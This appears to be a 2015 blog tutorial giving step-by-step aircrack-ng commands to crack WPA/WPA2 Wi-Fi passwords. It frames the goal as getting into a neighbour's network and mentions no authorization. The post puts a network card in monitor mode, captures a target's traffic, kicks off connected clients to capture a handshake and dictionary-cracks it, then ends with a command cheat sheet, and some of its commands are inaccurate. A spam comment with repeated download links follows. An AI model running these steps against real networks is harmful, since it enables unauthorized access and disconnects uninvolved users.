Search This Blog

Saturday, 1 August 2015

How to crack/hack wifi network's password using BACKTRACK 5. (WPA/WPA2)




                  How to Crack wifi network’s password

          Wireless Hacking Using Backtrack Introduction

    Hello and welcome to my tutorial about wireless networking.

    Today I’ll be teaching you how easy it is to obtain access to a wireless protected network by cracking the Wi-Fi network’s password.

                  How to Crack WPA/WPA2 Passowrd

 There are lots of questions coming from the beginners on how to get WEP/WPA/WPA2 password and accessing neighbor’s wi-fi connection.



    We all should be aware of fact that Wep Encrpytion is easy to crack while WPA and WPA2 is comparatively difficult and it needs a handshake dictionary.

    wpa encryption

    So lets begin. What you will need for this crack is a dictionary file that we are going to use to get the WPA/WPA2 password.

    Remember, the bigger the dictionary file is the greater the chance you have in cracking the password.

    So now you are probably wondering, where do I get a dictionary file? Well, I don’t know if this is allowed or not but I recently downloaded a 1.9GB dictionary file.You can google for it. STEP 1:

    Okay, so firstly open up a terminal and once we have the terminal open we are going to type in airmon-ng which will display our wireless interfaces.

    In my case I have wlan0, and now we are going to put it into monitor mode.

    wireless hacking STEP 2:

    Type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface. STEP 3:

    Lets type in airodump-ng mon0 and this command is going to initiate the scanning process for wifi networks. As you can see in the picture below, a few WPA encrypted networks should pop up. I’m going to attempt to crack the network under the bssidSKIDH?CKER. Take a note of the channel, and you want to copy the BSSID for later use.

    hack wifi STEP 4:

    Now type airodump-ng -c (channel) -w (filename) –bssid (bssid) mon0, and replace the values to fit what you got from the last step. Don’t forget to remember what filename you chose, because we are going to need that at the end.

    hack wifi passwords What is needed to get the WPA or WPA2 key is something called a WPA Handshake. You can obtain a handshake by kicking someone off the network, and those computers will automatically reconnect which will give you the handshake.

    This means, if there is no one on the network, you can’t get a handshake, and you can’t crack the security of WPA network. STEP 5:

    So how do we know if someone is connected?Well look at the lower part of the airodump command, and you will notice something as STATION, and underneath that if someone is connected it wil show you their mac address.

    WPA handshake

    Once you get a handshake, airodump will alert you in the top screen, and the handshake will be located right from the time stamp. STEP 6:

    Okay, so lets open up a new terminal and we are going to kick off the computers connected. Lets type in aireplay-ng -1 0 -a (bssid) mon0. Replace bssid with the network you are trying to crack and hit enter. It is going to attempt to kick off a client, and if it succeeds you will see the wpa handshake at the top right corner, if you don’t run the aireplay command a couple of times.

    Backtrack

    So now that we have a wpa handshake file, we are going to attempt to crack it. STEP 7:

    Lets stop the scan by pressing CONTROL + C on the terminal where airodump is running. Now in order to find the handshake file, you need to go in the top menu and chose Places > Home Folder. Okay, so lets open up a terminal and we are going to type in aircrack-ng -w (dictionary) /root/(filename). Where filename is the filename you specified when capturing the wpa handshake and the dictionary is the path of the wordlist you downloaded. STEP 8:

    This can be done by dragging in the handshake file into the terminal after the aircrack-ng -w (dictionary) command and it will parse in it’s directory. All you need to do is hit enter. The password needs to be in the dictionary file, so the bigger the wordlist is the bigger are the chances of you getting the password.

    handshake If the password is in the wordlist, it will give you a success message and the key in brackets. Happy hacking..!

    commands

    =>> airmon-ng This backtrack command displays the wireless interfaces.

    =>> airmon-ng start wlan0 This command starts monitoring mode on a wi-fi device.

    =>> airodump-ng mon0 This command shows all of the wi-fi networks online.

    =>> airodump-ng -c (channel) -w (filename) –bssid (bssid) mon0 This command specifies the wi-fi device to concentrate to one network.

    =>> aireplay-ng -1 0 -a (bssid) mon0 This command kicks off clients that are connected, and gets the handshake.

    =>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0 This command boosts the data, when cracking WEP.

    =>> aircrack-ng -w (dictionary) (wpa handshake) This command is used when cracking WPA or WPA2 networks.

    =>> aircrack-ng (filename)*.cap This command is used when cracking WEP networks.



1 comment:

  1. Tech Tricks And Hacks: How To Crack/Hack Wifi Network'S Password Using Backtrack 5. (Wpa/Wpa2) >>>>> Download Now

    >>>>> Download Full

    Tech Tricks And Hacks: How To Crack/Hack Wifi Network'S Password Using Backtrack 5. (Wpa/Wpa2) >>>>> Download LINK

    >>>>> Download Now

    Tech Tricks And Hacks: How To Crack/Hack Wifi Network'S Password Using Backtrack 5. (Wpa/Wpa2) >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete

Powered By Blogger